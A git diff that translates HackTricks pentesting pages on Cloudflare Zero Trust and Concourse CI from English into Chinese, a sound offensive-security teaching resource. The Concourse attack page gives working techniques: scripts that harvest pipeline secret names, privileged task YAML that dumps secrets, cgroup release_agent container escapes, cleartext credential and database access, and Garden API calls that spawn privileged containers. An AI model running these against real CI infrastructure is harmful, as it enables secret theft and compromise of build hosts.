检查 **谁** 可以访问该应用程序的 **Policies**,并确保 **只有** 需要访问该应用程序的 **用户** 可以访问。 +- 要允许访问,将使用 **`Access Groups`**(并且 **还可以设置额外规则**) +- [ ] 检查 **可用的身份提供者**,确保它们 **不太开放** +- [ ] 在 **`Settings`** 中: +- [ ] 检查 **CORS 未启用**(如果启用,检查它是否 **安全**,并且不允许所有内容) +- [ ] Cookies 应具有 **Strict Same-Site** 属性,**HTTP Only** 和 **绑定 cookie** 应在应用程序为 HTTP 时 **启用**。 +- [ ] 考虑启用 **浏览器渲染** 以获得更好的 **保护。更多信息请参见** [**远程浏览器隔离**](https://blog.cloudflare.com/cloudflare-and-remote-browser-isolation/)**。** #### **Access Groups** -- [ ] Check that the access groups generated are **correctly restricted** to the users they should allow. -- [ ] It's specially important to check that the **default access group isn't very open** (it's **not allowing too many people**) as by **default** anyone in that **group** is going to be able to **access applications**. - - Note that it's possible to give **access** to **EVERYONE** and other **very open policies** that aren't recommended unless 100% necessary. +- [ ] 检查生成的访问组是否 **正确限制** 了它们应该允许的用户。 +- [ ] 特别重要的是检查 **默认访问组不太开放**(**不允许太多人**),因为 **默认情况下** 该 **组** 中的任何人都将能够 **访问应用程序**。 +- 请注意,可以给 **每个人** 和其他 **非常开放的策略** 赋予 **访问权限**,除非 100% 必要,否则不推荐使用。 #### Service Auth -- [ ] Check that all service tokens **expires in 1 year or less** +- [ ] 检查所有服务令牌 **在 1 年或更短时间内过期** #### Tunnels @@ -50,16 +50,12 @@ TODO ### Logs -- [ ] You could search for **unexpected actions** from users +- [ ] 您可以搜索用户的 **意外操作** ### Settings -- [ ] Check the **plan type** -- [ ] It's possible to see the **credits card owner name**, **last 4 digits**, **expiration** date and **address** -- [ ] It's recommended to **add a User Seat Expiration** to remove users that doesn't really use this service +- [ ] 检查 **计划类型** +- [ ] 可以查看 **信用卡持有者姓名**、**最后 4 位数字**、**到期** 日期和 **地址** +- [ ] 建议 **添加用户座位到期** 以移除不真正使用此服务的用户 {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/concourse-security/README.md b/src/pentesting-ci-cd/concourse-security/README.md index bcf20facf..72cf53091 100644 --- a/src/pentesting-ci-cd/concourse-security/README.md +++ b/src/pentesting-ci-cd/concourse-security/README.md @@ -2,36 +2,32 @@ {{#include ../../banners/hacktricks-training.md}} -## Basic Information +## 基本信息 -Concourse allows you to **build pipelines** to automatically run tests, actions and build images whenever you need it (time based, when something happens...) +Concourse 允许您 **构建管道** 以在需要时自动运行测试、操作和构建镜像(基于时间,或在发生某些事情时...) -## Concourse Architecture +## Concourse 架构 -Learn how the concourse environment is structured in: +了解 concourse 环境的结构: {{#ref}} concourse-architecture.md {{#endref}} -## Concourse Lab +## Concourse 实验室 -Learn how you can run a concourse environment locally to do your own tests in: +了解如何在本地运行 concourse 环境以进行自己的测试: {{#ref}} concourse-lab-creation.md {{#endref}} -## Enumerate & Attack Concourse +## 枚举与攻击 Concourse -Learn how you can enumerate the concourse environment and abuse it in: +了解如何枚举 concourse 环境并利用它: {{#ref}} concourse-enumeration-and-attacks.md {{#endref}} {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/concourse-security/concourse-architecture.md b/src/pentesting-ci-cd/concourse-security/concourse-architecture.md index d70167906..a454847ef 100644 --- a/src/pentesting-ci-cd/concourse-security/concourse-architecture.md +++ b/src/pentesting-ci-cd/concourse-security/concourse-architecture.md @@ -4,7 +4,7 @@ {{#include ../../banners/hacktricks-training.md}} -[**Relevant data from Concourse documentation:**](https://concourse-ci.org/internals.html) +[**来自Concourse文档的相关数据:**](https://concourse-ci.org/internals.html) ### Architecture @@ -12,31 +12,27 @@ #### ATC: web UI & build scheduler -The ATC is the heart of Concourse. It runs the **web UI and API** and is responsible for all pipeline **scheduling**. It **connects to PostgreSQL**, which it uses to store pipeline data (including build logs). +ATC是Concourse的核心。它运行**web UI和API**,并负责所有管道**调度**。它**连接到PostgreSQL**,用于存储管道数据(包括构建日志)。 -The [checker](https://concourse-ci.org/checker.html)'s responsibility is to continuously checks for new versions of resources. The [scheduler](https://concourse-ci.org/scheduler.html) is responsible for scheduling builds for a job and the [build tracker](https://concourse-ci.org/build-tracker.html) is responsible for running any scheduled builds. The [garbage collector](https://concourse-ci.org/garbage-collector.html) is the cleanup mechanism for removing any unused or outdated objects, such as containers and volumes. +[checker](https://concourse-ci.org/checker.html)的职责是持续检查资源的新版本。[scheduler](https://concourse-ci.org/scheduler.html)负责为作业调度构建,而[build tracker](https://concourse-ci.org/build-tracker.html)负责运行任何已调度的构建。[garbage collector](https://concourse-ci.org/garbage-collector.html)是用于清理任何未使用或过时对象(如容器和卷)的机制。 #### TSA: worker registration & forwarding -The TSA is a **custom-built SSH server** that is used solely for securely **registering** [**workers**](https://concourse-ci.org/internals.html#architecture-worker) with the [ATC](https://concourse-ci.org/internals.html#component-atc). +TSA是一个**定制的SSH服务器**,仅用于安全地**注册**[**workers**](https://concourse-ci.org/internals.html#architecture-worker)与[ATC](https://concourse-ci.org/internals.html#component-atc)。 -The TSA by **default listens on port `2222`**, and is usually colocated with the [ATC](https://concourse-ci.org/internals.html#component-atc) and sitting behind a load balancer. +TSA默认监听端口`2222`,通常与[ATC](https://concourse-ci.org/internals.html#component-atc)共同放置,并位于负载均衡器后面。 -The **TSA implements CLI over the SSH connection,** supporting [**these commands**](https://concourse-ci.org/internals.html#component-tsa). +**TSA通过SSH连接实现CLI,**支持[**这些命令**](https://concourse-ci.org/internals.html#component-tsa)。 #### Workers -In order to execute tasks concourse must have some workers. These workers **register themselves** via the [TSA](https://concourse-ci.org/internals.html#component-tsa) and run the services [**Garden**](https://github.com/cloudfoundry-incubator/garden) and [**Baggageclaim**](https://github.com/concourse/baggageclaim). +为了执行任务,Concourse必须有一些workers。这些workers通过[TSA](https://concourse-ci.org/internals.html#component-tsa)进行**自我注册**,并运行服务[**Garden**](https://github.com/cloudfoundry-incubator/garden)和[**Baggageclaim**](https://github.com/concourse/baggageclaim)。 -- **Garden**: This is the **Container Manage AP**I, usually run in **port 7777** via **HTTP**. -- **Baggageclaim**: This is the **Volume Management API**, usually run in **port 7788** via **HTTP**. +- **Garden**:这是**容器管理API**,通常通过**HTTP**在**端口7777**上运行。 +- **Baggageclaim**:这是**卷管理API**,通常通过**HTTP**在**端口7788**上运行。 ## References - [https://concourse-ci.org/internals.html](https://concourse-ci.org/internals.html) {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md b/src/pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md index 4b778a804..c4b5faf48 100644 --- a/src/pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md +++ b/src/pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md @@ -4,49 +4,47 @@ {{#include ../../banners/hacktricks-training.md}} -### User Roles & Permissions +### 用户角色与权限 -Concourse comes with five roles: +Concourse 具有五个角色: -- _Concourse_ **Admin**: This role is only given to owners of the **main team** (default initial concourse team). Admins can **configure other teams** (e.g.: `fly set-team`, `fly destroy-team`...). The permissions of this role cannot be affected by RBAC. -- **owner**: Team owners can **modify everything within the team**. -- **member**: Team members can **read and write** within the **teams assets** but cannot modify the team settings. -- **pipeline-operator**: Pipeline operators can perform **pipeline operations** such as triggering builds and pinning resources, however they cannot update pipeline configurations. -- **viewer**: Team viewers have **"read-only" access to a team** and its pipelines. +- _Concourse_ **管理员**:此角色仅授予 **主团队**(默认初始 concourse 团队)的所有者。管理员可以 **配置其他团队**(例如:`fly set-team`,`fly destroy-team`...)。此角色的权限无法通过 RBAC 进行影响。 +- **所有者**:团队所有者可以 **修改团队内的所有内容**。 +- **成员**:团队成员可以在 **团队资产** 中 **读取和写入**,但无法修改团队设置。 +- **管道操作员**:管道操作员可以执行 **管道操作**,例如触发构建和固定资源,但无法更新管道配置。 +- **查看者**:团队查看者对团队及其管道具有 **“只读”** 访问权限。 > [!NOTE] -> Moreover, the **permissions of the roles owner, member, pipeline-operator and viewer can be modified** configuring RBAC (configuring more specifically it's actions). Read more about it in: [https://concourse-ci.org/user-roles.html](https://concourse-ci.org/user-roles.html) +> 此外,**所有者、成员、管道操作员和查看者的角色权限可以通过配置 RBAC 进行修改**(更具体地说是其操作)。有关更多信息,请阅读:[https://concourse-ci.org/user-roles.html](https://concourse-ci.org/user-roles.html) -Note that Concourse **groups pipelines inside Teams**. Therefore users belonging to a Team will be able to manage those pipelines and **several Teams** might exist. A user can belong to several Teams and have different permissions inside each of them. +请注意,Concourse **将管道分组到团队中**。因此,属于某个团队的用户将能够管理这些管道,并且 **可能存在多个团队**。用户可以属于多个团队,并在每个团队中拥有不同的权限。 -### Vars & Credential Manager +### 变量与凭证管理器 -In the YAML configs you can configure values using the syntax `((_source-name_:_secret-path_._secret-field_))`.\ -[From the docs:](https://concourse-ci.org/vars.html#var-syntax) The **source-name is optional**, and if omitted, the [cluster-wide credential manager](https://concourse-ci.org/vars.html#cluster-wide-credential-manager) will be used, or the value may be provided [statically](https://concourse-ci.org/vars.html#static-vars).\ -The **optional \_secret-field**\_ specifies a field on the fetched secret to read. If omitted, the credential manager may choose to read a 'default field' from the fetched credential if the field exists.\ -Moreover, the _**secret-path**_ and _**secret-field**_ may be surrounded by double quotes `"..."` if they **contain special characters** like `.` and `:`. For instance, `((source:"my.secret"."field:1"))` will set the _secret-path_ to `my.secret` and the _secret-field_ to `field:1`. +在 YAML 配置中,您可以使用语法 `((_source-name_:_secret-path_._secret-field_))` 配置值。\ +[来自文档:](https://concourse-ci.org/vars.html#var-syntax) **source-name 是可选的**,如果省略,将使用 [集群范围的凭证管理器](https://concourse-ci.org/vars.html#cluster-wide-credential-manager),或者可以 [静态提供值](https://concourse-ci.org/vars.html#static-vars)。\ +**可选的 \_secret-field**\_ 指定要读取的获取凭证上的字段。如果省略,凭证管理器可以选择从获取的凭证中读取“默认字段”,如果该字段存在。\ +此外,_**secret-path**_ 和 _**secret-field**_ 如果 **包含特殊字符**(如 `.` 和 `:`),可以用双引号 `"..."` 括起来。例如,`((source:"my.secret"."field:1"))` 将把 _secret-path_ 设置为 `my.secret`,将 _secret-field_ 设置为 `field:1`。 -#### Static Vars - -Static vars can be specified in **tasks steps**: +#### 静态变量 +静态变量可以在 **任务步骤** 中指定: ```yaml - task: unit-1.13 - file: booklit/ci/unit.yml - vars: { tag: 1.13 } +file: booklit/ci/unit.yml +vars: { tag: 1.13 } ``` - Or using the following `fly` **arguments**: -- `-v` or `--var` `NAME=VALUE` sets the string `VALUE` as the value for the var `NAME`. -- `-y` or `--yaml-var` `NAME=VALUE` parses `VALUE` as YAML and sets it as the value for the var `NAME`. -- `-i` or `--instance-var` `NAME=VALUE` parses `VALUE` as YAML and sets it as the value for the instance var `NAME`. See [Grouping Pipelines](https://concourse-ci.org/instanced-pipelines.html) to learn more about instance vars. -- `-l` or `--load-vars-from` `FILE` loads `FILE`, a YAML document containing mapping var names to values, and sets them all. +- `-v` or `--var` `NAME=VALUE` 将字符串 `VALUE` 设置为变量 `NAME` 的值。 +- `-y` or `--yaml-var` `NAME=VALUE` 将 `VALUE` 解析为 YAML,并将其设置为变量 `NAME` 的值。 +- `-i` or `--instance-var` `NAME=VALUE` 将 `VALUE` 解析为 YAML,并将其设置为实例变量 `NAME` 的值。有关实例变量的更多信息,请参见 [Grouping Pipelines](https://concourse-ci.org/instanced-pipelines.html)。 +- `-l` or `--load-vars-from` `FILE` 加载 `FILE`,这是一个包含变量名称与值映射的 YAML 文档,并设置所有变量。 #### Credential Management -There are different ways a **Credential Manager can be specified** in a pipeline, read how in [https://concourse-ci.org/creds.html](https://concourse-ci.org/creds.html).\ -Moreover, Concourse supports different credential managers: +在管道中可以通过不同方式指定 **Credential Manager**,请阅读 [https://concourse-ci.org/creds.html](https://concourse-ci.org/creds.html)。\ +此外,Concourse 支持不同的凭证管理器: - [The Vault credential manager](https://concourse-ci.org/vault-credential-manager.html) - [The CredHub credential manager](https://concourse-ci.org/credhub-credential-manager.html) @@ -59,160 +57,151 @@ Moreover, Concourse supports different credential managers: - [Retrying failed fetches](https://concourse-ci.org/creds-retry-logic.html) > [!CAUTION] -> Note that if you have some kind of **write access to Concourse** you can create jobs to **exfiltrate those secrets** as Concourse needs to be able to access them. +> 请注意,如果您对 Concourse 有某种 **写入访问权限**,您可以创建作业来 **提取这些秘密**,因为 Concourse 需要能够访问它们。 ### Concourse Enumeration -In order to enumerate a concourse environment you first need to **gather valid credentials** or to find an **authenticated token** probably in a `.flyrc` config file. +为了枚举一个 concourse 环境,您首先需要 **收集有效凭证** 或找到一个 **认证令牌**,可能在 `.flyrc` 配置文件中。 #### Login and Current User enum -- To login you need to know the **endpoint**, the **team name** (default is `main`) and a **team the user belongs to**: - - `fly --target example login --team-name my-team --concourse-url https://ci.example.com [--insecure] [--client-cert=./path --client-key=./path]` -- Get configured **targets**: - - `fly targets` -- Get if the configured **target connection** is still **valid**: - - `fly -t status` -- Get **role** of the user against the indicated target: - - `fly -t userinfo` +- 要登录,您需要知道 **端点**、**团队名称**(默认是 `main`)和 **用户所属的团队**: +- `fly --target example login --team-name my-team --concourse-url https://ci.example.com [--insecure] [--client-cert=./path --client-key=./path]` +- 获取配置的 **targets**: +- `fly targets` +- 获取配置的 **target 连接**是否仍然 **有效**: +- `fly -t status` +- 获取用户在指定目标下的 **角色**: +- `fly -t userinfo` > [!NOTE] -> Note that the **API token** is **saved** in `$HOME/.flyrc` by default, you looting a machines you could find there the credentials. +> 请注意,**API token** 默认保存在 `$HOME/.flyrc` 中,您在盗取机器时可以在那里找到凭证。 #### Teams & Users -- Get a list of the Teams - - `fly -t teams` -- Get roles inside team - - `fly -t get-team -n ` -- Get a list of users - - `fly -t active-users` +- 获取团队列表 +- `fly -t teams` +- 获取团队内的角色 +- `fly -t get-team -n ` +- 获取用户列表 +- `fly -t active-users` #### Pipelines -- **List** pipelines: - - `fly -t pipelines -a` -- **Get** pipeline yaml (**sensitive information** might be found in the definition): - - `fly -t get-pipeline -p ` -- Get all pipeline **config declared vars** - - `for pipename in $(fly -t pipelines | grep -Ev "^id" | awk '{print $2}'); do echo $pipename; fly -t get-pipeline -p $pipename -j | grep -Eo '"vars":[^}]+'; done` -- Get all the **pipelines secret names used** (if you can create/modify a job or hijack a container you could exfiltrate them): - +- **列出** 管道: +- `fly -t pipelines -a` +- **获取** 管道 yaml(**敏感信息**可能在定义中找到): +- `fly -t get-pipeline -p ` +- 获取所有管道 **配置声明的变量** +- `for pipename in $(fly -t pipelines | grep -Ev "^id" | awk '{print $2}'); do echo $pipename; fly -t get-pipeline -p $pipename -j | grep -Eo '"vars":[^}]+'; done` +- 获取所有 **管道使用的秘密名称**(如果您可以创建/修改作业或劫持容器,您可以提取它们): ```bash rm /tmp/secrets.txt; for pipename in $(fly -t onelogin pipelines | grep -Ev "^id" | awk '{print $2}'); do - echo $pipename; - fly -t onelogin get-pipeline -p $pipename | grep -Eo '\(\(.*\)\)' | sort | uniq | tee -a /tmp/secrets.txt; - echo ""; +echo $pipename; +fly -t onelogin get-pipeline -p $pipename | grep -Eo '\(\(.*\)\)' | sort | uniq | tee -a /tmp/secrets.txt; +echo ""; done echo "" echo "ALL SECRETS" cat /tmp/secrets.txt | sort | uniq rm /tmp/secrets.txt ``` +#### 容器与工作者 -#### Containers & Workers +- 列出 **workers**: +- `fly -t workers` +- 列出 **containers**: +- `fly -t containers` +- 列出 **builds** (查看正在运行的内容): +- `fly -t builds` -- List **workers**: - - `fly -t workers` -- List **containers**: - - `fly -t containers` -- List **builds** (to see what is running): - - `fly -t builds` +### Concourse 攻击 -### Concourse Attacks - -#### Credentials Brute-Force +#### 凭证暴力破解 - admin:admin - test:test -#### Secrets and params enumeration +#### 秘密和参数枚举 -In the previous section we saw how you can **get all the secrets names and vars** used by the pipeline. The **vars might contain sensitive info** and the name of the **secrets will be useful later to try to steal** them. +在上一节中,我们看到如何 **获取管道使用的所有秘密名称和变量**。**变量可能包含敏感信息**,而 **秘密的名称在稍后尝试窃取它们时将非常有用**。 -#### Session inside running or recently run container - -If you have enough privileges (**member role or more**) you will be able to **list pipelines and roles** and just get a **session inside** the `/` **container** using: +#### 在运行或最近运行的容器内会话 +如果您拥有足够的权限(**成员角色或更高**),您将能够 **列出管道和角色**,并使用以下命令直接进入 `/` **容器**: ```bash fly -t tutorial intercept --job pipeline-name/job-name fly -t tutorial intercept # To be presented a prompt with all the options ``` +有了这些权限,您可能能够: -With these permissions you might be able to: +- **窃取** **容器** 内部的秘密 +- 尝试 **逃逸** 到节点 +- 枚举/滥用 **云元数据** 端点(从 pod 和节点,如果可能的话) -- **Steal the secrets** inside the **container** -- Try to **escape** to the node -- Enumerate/Abuse **cloud metadata** endpoint (from the pod and from the node, if possible) - -#### Pipeline Creation/Modification - -If you have enough privileges (**member role or more**) you will be able to **create/modify new pipelines.** Check this example: +#### 管道创建/修改 +如果您拥有足够的权限(**成员角色或更高**),您将能够 **创建/修改新管道。** 请查看这个例子: ```yaml jobs: - - name: simple - plan: - - task: simple-task - privileged: true - config: - # Tells Concourse which type of worker this task should run on - platform: linux - image_resource: - type: registry-image - source: - repository: busybox # images are pulled from docker hub by default - run: - path: sh - args: - - -cx - - | - echo "$SUPER_SECRET" - sleep 1000 - params: - SUPER_SECRET: ((super.secret)) +- name: simple +plan: +- task: simple-task +privileged: true +config: +# Tells Concourse which type of worker this task should run on +platform: linux +image_resource: +type: registry-image +source: +repository: busybox # images are pulled from docker hub by default +run: +path: sh +args: +- -cx +- | +echo "$SUPER_SECRET" +sleep 1000 +params: +SUPER_SECRET: ((super.secret)) ``` +通过**修改/创建**新管道,您将能够: -With the **modification/creation** of a new pipeline you will be able to: +- **窃取** **秘密**(通过回显它们或进入容器并运行 `env`) +- **逃逸**到**节点**(通过给予您足够的权限 - `privileged: true`) +- 枚举/滥用**云元数据**端点(从 pod 和节点) +- **删除**创建的管道 -- **Steal** the **secrets** (via echoing them out or getting inside the container and running `env`) -- **Escape** to the **node** (by giving you enough privileges - `privileged: true`) -- Enumerate/Abuse **cloud metadata** endpoint (from the pod and from the node) -- **Delete** created pipeline - -#### Execute Custom Task - -This is similar to the previous method but instead of modifying/creating a whole new pipeline you can **just execute a custom task** (which will probably be much more **stealthier**): +#### 执行自定义任务 +这与之前的方法类似,但您可以**仅执行自定义任务**(这可能会更加**隐蔽**): ```yaml # For more task_config options check https://concourse-ci.org/tasks.html platform: linux image_resource: - type: registry-image - source: - repository: ubuntu +type: registry-image +source: +repository: ubuntu run: - path: sh - args: - - -cx - - | - env - sleep 1000 +path: sh +args: +- -cx +- | +env +sleep 1000 params: - SUPER_SECRET: ((super.secret)) +SUPER_SECRET: ((super.secret)) ``` ```bash fly -t tutorial execute --privileged --config task_config.yml ``` +#### 从特权任务逃逸到节点 -#### Escaping to the node from privileged task - -In the previous sections we saw how to **execute a privileged task with concourse**. This won't give the container exactly the same access as the privileged flag in a docker container. For example, you won't see the node filesystem device in /dev, so the escape could be more "complex". - -In the following PoC we are going to use the release_agent to escape with some small modifications: +在前面的部分中,我们看到如何**使用concourse执行特权任务**。这不会给容器提供与docker容器中的特权标志完全相同的访问权限。例如,您不会在/dev中看到节点文件系统设备,因此逃逸可能会更“复杂”。 +在以下PoC中,我们将使用release_agent进行逃逸,并进行一些小的修改: ```bash # Mounts the RDMA cgroup controller and create a child cgroup # If you're following along and get "mount: /tmp/cgrp: special device cgroup does not exist" @@ -270,14 +259,12 @@ sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs" # Reads the output cat /output ``` - > [!WARNING] -> As you might have noticed this is just a [**regular release_agent escape**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/concourse-security/broken-reference/README.md) just modifying the path of the cmd in the node +> 正如您可能注意到的,这只是一个 [**常规 release_agent 逃逸**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/concourse-security/broken-reference/README.md),只是修改了节点中 cmd 的路径 -#### Escaping to the node from a Worker container - -A regular release_agent escape with a minor modification is enough for this: +#### 从 Worker 容器逃逸到节点 +一个常规的 release_agent 逃逸,稍作修改就足够了: ```bash mkdir /tmp/cgrp && mount -t cgroup -o memory cgroup /tmp/cgrp && mkdir /tmp/cgrp/x @@ -304,13 +291,11 @@ sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs" # Reads the output cat /output ``` +#### 从Web容器逃逸到节点 -#### Escaping to the node from the Web container - -Even if the web container has some defenses disabled it's **not running as a common privileged container** (for example, you **cannot** **mount** and the **capabilities** are very **limited**, so all the easy ways to escape from the container are useless). - -However, it stores **local credentials in clear text**: +即使Web容器禁用了某些防御,它也**不是以普通特权容器的身份运行**(例如,您**无法** **挂载**,并且**能力**非常**有限**,因此所有简单的逃逸容器的方法都是无效的)。 +然而,它以明文形式存储**本地凭据**: ```bash cat /concourse-auth/local-users test:test @@ -319,11 +304,9 @@ env | grep -i local_user CONCOURSE_MAIN_TEAM_LOCAL_USER=test CONCOURSE_ADD_LOCAL_USER=test:test ``` +您可以使用该凭据**登录到网络服务器**并**创建一个特权容器并逃逸到节点**。 -You cloud use that credentials to **login against the web server** and **create a privileged container and escape to the node**. - -In the environment you can also find information to **access the postgresql** instance that concourse uses (address, **username**, **password** and database among other info): - +在环境中,您还可以找到信息以**访问concourse使用的postgresql**实例(地址、**用户名**、**密码**和数据库等信息): ```bash env | grep -i postg CONCOURSE_RELEASE_POSTGRESQL_PORT_5432_TCP_ADDR=10.107.191.238 @@ -344,39 +327,35 @@ select * from refresh_token; select * from teams; #Change the permissions of the users in the teams select * from users; ``` - -#### Abusing Garden Service - Not a real Attack +#### 滥用 Garden 服务 - 不是一个真正的攻击 > [!WARNING] -> This are just some interesting notes about the service, but because it's only listening on localhost, this notes won't present any impact we haven't already exploited before +> 这些只是关于该服务的一些有趣的笔记,但由于它仅在本地主机上监听,这些笔记不会带来我们尚未利用过的任何影响 -By default each concourse worker will be running a [**Garden**](https://github.com/cloudfoundry/garden) service in port 7777. This service is used by the Web master to indicate the worker **what he needs to execute** (download the image and run each task). This sound pretty good for an attacker, but there are some nice protections: +默认情况下,每个 concourse worker 将在 7777 端口运行一个 [**Garden**](https://github.com/cloudfoundry/garden) 服务。该服务由 Web 主机用于指示 worker **需要执行的内容**(下载镜像并运行每个任务)。这对攻击者来说听起来不错,但有一些很好的保护措施: -- It's just **exposed locally** (127..0.0.1) and I think when the worker authenticates agains the Web with the special SSH service, a tunnel is created so the web server can **talk to each Garden service** inside each worker. -- The web server is **monitoring the running containers every few seconds**, and **unexpected** containers are **deleted**. So if you want to **run a custom container** you need to **tamper** with the **communication** between the web server and the garden service. - -Concourse workers run with high container privileges: +- 它仅**在本地暴露**(127..0.0.1),我认为当 worker 通过特殊的 SSH 服务对 Web 进行身份验证时,会创建一个隧道,以便 Web 服务器可以**与每个 worker 内的 Garden 服务进行通信**。 +- Web 服务器**每隔几秒监控运行的容器**,并且**意外的**容器会被**删除**。因此,如果您想要**运行自定义容器**,您需要**篡改** Web 服务器与 Garden 服务之间的**通信**。 +Concourse workers 以高容器权限运行: ``` Container Runtime: docker Has Namespaces: - pid: true - user: false +pid: true +user: false AppArmor Profile: kernel Capabilities: - BOUNDING -> chown dac_override dac_read_search fowner fsetid kill setgid setuid setpcap linux_immutable net_bind_service net_broadcast net_admin net_raw ipc_lock ipc_owner sys_module sys_rawio sys_chroot sys_ptrace sys_pacct sys_admin sys_boot sys_nice sys_resource sys_time sys_tty_config mknod lease audit_write audit_control setfcap mac_override mac_admin syslog wake_alarm block_suspend audit_read +BOUNDING -> chown dac_override dac_read_search fowner fsetid kill setgid setuid setpcap linux_immutable net_bind_service net_broadcast net_admin net_raw ipc_lock ipc_owner sys_module sys_rawio sys_chroot sys_ptrace sys_pacct sys_admin sys_boot sys_nice sys_resource sys_time sys_tty_config mknod lease audit_write audit_control setfcap mac_override mac_admin syslog wake_alarm block_suspend audit_read Seccomp: disabled ``` - -However, techniques like **mounting** the /dev device of the node or release_agent **won't work** (as the real device with the filesystem of the node isn't accesible, only a virtual one). We cannot access processes of the node, so escaping from the node without kernel exploits get complicated. +然而,像**挂载**节点的 /dev 设备或 release_agent 的技术**不会工作**(因为节点的真实设备与文件系统不可访问,只有一个虚拟设备)。我们无法访问节点的进程,因此在没有内核漏洞的情况下逃离节点变得复杂。 > [!NOTE] -> In the previous section we saw how to escape from a privileged container, so if we can **execute** commands in a **privileged container** created by the **current** **worker**, we could **escape to the node**. +> 在上一节中,我们看到如何从特权容器中逃脱,因此如果我们可以在**当前** **工作者**创建的**特权容器**中**执行**命令,我们就可以**逃离到节点**。 -Note that playing with concourse I noted that when a new container is spawned to run something, the container processes are accessible from the worker container, so it's like a container creating a new container inside of it. - -**Getting inside a running privileged container** +请注意,在玩弄 concourse 时,我注意到当一个新容器被生成以运行某些东西时,容器进程可以从工作者容器访问,因此就像一个容器在内部创建一个新容器。 +**进入一个正在运行的特权容器** ```bash # Get current container curl 127.0.0.1:7777/containers @@ -389,30 +368,26 @@ curl 127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/properties # Execute a new process inside a container ## In this case "sleep 20000" will be executed in the container with handler ac793559-7f53-4efc-6591-0171a0391e53 wget -v -O- --post-data='{"id":"task2","path":"sh","args":["-cx","sleep 20000"],"dir":"/tmp/build/e55deab7","rlimits":{},"tty":{"window_size":{"columns":500,"rows":500}},"image":{}}' \ - --header='Content-Type:application/json' \ - 'http://127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/processes' +--header='Content-Type:application/json' \ +'http://127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/processes' # OR instead of doing all of that, you could just get into the ns of the process of the privileged container nsenter --target 76011 --mount --uts --ipc --net --pid -- sh ``` +**创建一个新的特权容器** -**Creating a new privileged container** - -You can very easily create a new container (just run a random UID) and execute something on it: - +您可以非常轻松地创建一个新容器(只需运行一个随机 UID)并在其上执行某些操作: ```bash curl -X POST http://127.0.0.1:7777/containers \ - -H 'Content-Type: application/json' \ - -d '{"handle":"123ae8fc-47ed-4eab-6b2e-123458880690","rootfs":"raw:///concourse-work-dir/volumes/live/ec172ffd-31b8-419c-4ab6-89504de17196/volume","image":{},"bind_mounts":[{"src_path":"/concourse-work-dir/volumes/live/9f367605-c9f0-405b-7756-9c113eba11f1/volume","dst_path":"/scratch","mode":1}],"properties":{"user":""},"env":["BUILD_ID=28","BUILD_NAME=24","BUILD_TEAM_ID=1","BUILD_TEAM_NAME=main","ATC_EXTERNAL_URL=http://127.0.0.1:8080"],"limits":{"bandwidth_limits":{},"cpu_limits":{},"disk_limits":{},"memory_limits":{},"pid_limits":{}}}' +-H 'Content-Type: application/json' \ +-d '{"handle":"123ae8fc-47ed-4eab-6b2e-123458880690","rootfs":"raw:///concourse-work-dir/volumes/live/ec172ffd-31b8-419c-4ab6-89504de17196/volume","image":{},"bind_mounts":[{"src_path":"/concourse-work-dir/volumes/live/9f367605-c9f0-405b-7756-9c113eba11f1/volume","dst_path":"/scratch","mode":1}],"properties":{"user":""},"env":["BUILD_ID=28","BUILD_NAME=24","BUILD_TEAM_ID=1","BUILD_TEAM_NAME=main","ATC_EXTERNAL_URL=http://127.0.0.1:8080"],"limits":{"bandwidth_limits":{},"cpu_limits":{},"disk_limits":{},"memory_limits":{},"pid_limits":{}}}' # Wget will be stucked there as long as the process is being executed wget -v -O- --post-data='{"id":"task2","path":"sh","args":["-cx","sleep 20000"],"dir":"/tmp/build/e55deab7","rlimits":{},"tty":{"window_size":{"columns":500,"rows":500}},"image":{}}' \ - --header='Content-Type:application/json' \ - 'http://127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/processes' +--header='Content-Type:application/json' \ +'http://127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/processes' ``` - -However, the web server is checking every few seconds the containers that are running, and if an unexpected one is discovered, it will be deleted. As the communication is occurring in HTTP, you could tamper the communication to avoid the deletion of unexpected containers: - +然而,网络服务器每隔几秒钟检查正在运行的容器,如果发现意外的容器,它将被删除。由于通信是在HTTP中进行的,您可以篡改通信以避免意外容器的删除: ``` GET /containers HTTP/1.1. Host: 127.0.0.1:7777. @@ -434,13 +409,8 @@ Host: 127.0.0.1:7777. User-Agent: Go-http-client/1.1. Accept-Encoding: gzip. ``` - -## References +## 参考 - https://concourse-ci.org/vars.html {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/concourse-security/concourse-lab-creation.md b/src/pentesting-ci-cd/concourse-security/concourse-lab-creation.md index 0cc6363a7..bef222449 100644 --- a/src/pentesting-ci-cd/concourse-security/concourse-lab-creation.md +++ b/src/pentesting-ci-cd/concourse-security/concourse-lab-creation.md @@ -2,25 +2,22 @@ {{#include ../../banners/hacktricks-training.md}} -## Testing Environment +## 测试环境 -### Running Concourse +### 运行 Concourse -#### With Docker-Compose - -This docker-compose file simplifies the installation to do some tests with concourse: +#### 使用 Docker-Compose +这个 docker-compose 文件简化了安装,以便进行一些与 concourse 的测试: ```bash wget https://raw.githubusercontent.com/starkandwayne/concourse-tutorial/master/docker-compose.yml docker-compose up -d ``` +您可以从网络上下载适用于您的操作系统的命令行 `fly`,地址为 `127.0.0.1:8080` -You can download the command line `fly` for your OS from the web in `127.0.0.1:8080` - -#### With Kubernetes (Recommended) - -You can easily deploy concourse in **Kubernetes** (in **minikube** for example) using the helm-chart: [**concourse-chart**](https://github.com/concourse/concourse-chart). +#### 使用 Kubernetes(推荐) +您可以使用 helm-chart 轻松在 **Kubernetes**(例如 **minikube**)中部署 concourse: 